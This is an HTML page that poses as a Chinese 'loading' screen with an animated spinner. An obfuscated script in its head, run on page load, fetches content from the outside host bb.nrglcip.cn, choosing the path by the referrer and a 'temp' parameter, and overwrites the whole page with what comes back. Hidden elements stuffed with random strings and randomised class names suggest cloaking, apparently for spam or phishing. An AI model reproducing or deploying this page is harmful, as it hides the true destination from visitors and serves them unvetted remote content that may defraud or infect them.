<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mf1KCYp7t {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mf1KCYp7t .IQhWdbVeE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mf1KCYp7t .content {
            line-height: 50px;
            text-align: center
        }

        .mf1KCYp7t .img {
            width: 100%
        }

        .mf1KCYp7t .IWzMYBn3a2P {
            text-align: center
        }

        .mf1KCYp7t .IWzMYBn3a2P span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mf1KCYp7t .IWzMYBn3a2P span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mf1KCYp7t .IWzMYBn3a2P span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mf1KCYp7t .IWzMYBn3a2P span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mf1KCYp7t .IWzMYBn3a2P span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mf1KCYp7t .IWzMYBn3a2P span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mf1KCYp7t .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sEGJGspK3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var plGReb = sEGJGspK3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ plGReb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ plGReb +".html?a=share";
		}
		
        Xgjt3uQt4=url+"#"+new Date().getTime();
        Xgjt3uQt4 && function() {
            $.get(Xgjt3uQt4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >J5hajRLPzN9qqtdCMUpuqGCusE8OwPIXdhKuSFAh</ul>
<a  href='#' style='display:none'>NIonlHPMEYImS</a>
<img  src='' style='display:none'><div class="mf1KCYp7t">
    <div class="IQhWdbVeE">
        <div class="IWzMYBn3a2P">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >HCYbcslH9eGQMs4fLzY6V1IoOZ1LmaL0pRV64VSAVxmZ1lEbB64GSncKmfIQbAt</h1>
<span style='display:none'>F9r1dO3V24MgteoqhSMjplojsZ20YakOm3udprpNPlcjDblzTrdSxp0ZrMK36EhhtDBabyvhYY</span>
<span style='display:none'>F9r1dO3V24MgteoqhSMjplojsZ20YakOm3udprpNPlcjDblzTrdSxp0ZrMK36EhhtDBabyvhYY</span>
<div style='display:none'>NyA2GXLjPpjZ5PvcY69x3WP9YaPYUsMWjKBjqwTm</div>
<span style='display:none'>F9r1dO3V24MgteoqhSMjplojsZ20YakOm3udprpNPlcjDblzTrdSxp0ZrMK36EhhtDBabyvhYY</span>
<a  href='#' style='display:none'>cgWo0hyJ6gMn0</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>cgWo0hyJ6gMn0</a></body>
</html>